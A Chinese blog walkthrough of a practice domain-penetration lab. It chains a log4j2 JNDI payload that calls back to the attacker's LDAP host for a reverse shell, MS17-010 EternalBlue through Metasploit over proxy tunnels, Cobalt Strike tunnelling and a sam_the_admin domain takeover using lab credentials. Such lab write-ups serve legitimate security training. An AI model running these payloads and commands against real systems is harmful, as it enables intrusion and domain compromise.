打靶 - 内部环境 - 某域渗透靶场-2

前言

打算把自己打过的靶的记录更新到博客中,主要更新一些常见的渗透思路和有意义的靶机(那些专门为打靶而设计还考考CTF的啥的就没必要看了)一是为了方便师傅跟着我打靶的顺序来直接打,二就是记录一下自己打靶的经历吧

本次的靶机是非常有意义的,也是算是一个很好的入门吧 涉及知识点如下

  1. log4j的RCE
  2. 内网MS17010
  3. 域渗透

信息收集

主机为192.168.0.129

image

1
masscan -p 1-65535 192.168.0.129 --rate=1000

这里用masscan好点,其他的fscan基本都是扫不到的,所以以后还是用masscan吧,舒服多了

image

image

1
nmap -sV 192.168.0.129 -sC -p 38080

没啥东西 发现是springboot的常规报错,尝试用springboot工具扫一下没啥结果然后就用目录扫描工具扫一下站点发现有个接口存在405

image

访问了一下发现是如下回显

image

发现切换了POST就存在200回显了

image

log4j2 - JNDI注入

由于作者说了是考log4j2所以就打了一下log4j2的payload 直接反弹shell

1
payload=${jndi:ldap://192.168.0.128:1389/Basic/ReverseShell/192.168.0.128/28888}

image

但是发现报错了

image

尝试换个payload来打tomcaecho的利用链子发现成功反弹(很奇怪我就是不行,而且他并不出网,不知道是不是我本地环境的问题)

直接用tomcatecho的链子就可以打进了拿到root下flag

image并且这里拿到了一对账号密码猜测为ssh进行登录

在这里其实是节省了一步的,出题人应该没有考核docker逃逸

内网MS17010

所以给了宿主机的ssh,所以可以直接扫内网,上传fscan

1
./fscan_amd64 -h 10.0.1.6/24

发现存在ms17010直接上msf即可

image

先传入frp代理进去

然后代理起msf

1
2
3
4
proxychains msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 10.0.1.7
run

结果还是那个傻卵子问题,打了三遍没反应,试试不走proxychains直接设置代理来打

设置msf的全局代理

1
2
setg Proxies socks5:127.0.0.1:5000
setg ReverseAllowProxy true

emm打了两遍还是不行,真离谱

尝试用正向链接

1
2
set payload windows/x64/meterpreter/bind_tcp
set target 1

成功拿到shell了(好难沃日)

image

在root桌面找到第二个flag

image

发现是system权限了

image

域渗透

抓密码

image

发现存在域 所以进行进程迁移到root组去查看域信息

1
migrate 1800 

image

1
ipconfig

发现存在第二张网卡

image

那就上传fscan继续扫一下看看内网情况

image

发现存在DC并且DC也是存在ms17010的所以建立隧道直接打

路由建立

1
2
run get_local_subnets
run post/multi/manage/autoroute

但是发现并没有成功

image

后续想尝试上一下CS,所以有了如下操作 ,先在linux当中进行http隧道的搭建

1
./proxy http -t tcp -p "0.0.0.0:8077" --daemon

然后通过建立http隧道的马子来上线CS使用goproxy代理转发上线

然后建立socks5隧道

image

image

然后走proxychains代理本地的端口即可

因为抓到域内用户的账号密码 所以想到通过域提权漏洞直接梭哈

1
proxychains python3 sam_the_admin.py "redteam/root:Red12345" -de-ip 10.0.0.12 -shell

image

拿到最后的flag在Administrator下

image

然后通过命令行开启3389 但是报了个什么编码错误 很裂开 搞了半天没成功 ..

image

如果能进 3389就可以复制马过去 然后走socks5隧道进行上线CS

总结

  • log4j还是有点不熟悉,去复现一下
  • 碰到域还是有点不知所措了
  • msf和cs的隧道配合起来用还真不错
  • 内网穿透这个东西真的太重要了

拓扑分析

image


打靶 - 内部环境 - 某域渗透靶场-2
https://zjackky.github.io/post/target-internal-environment-a-certain-domain-penetration-of-the-shooting-range-2-z1o0fjq.html
作者
Zjacky
发布于
2023年11月6日
许可协议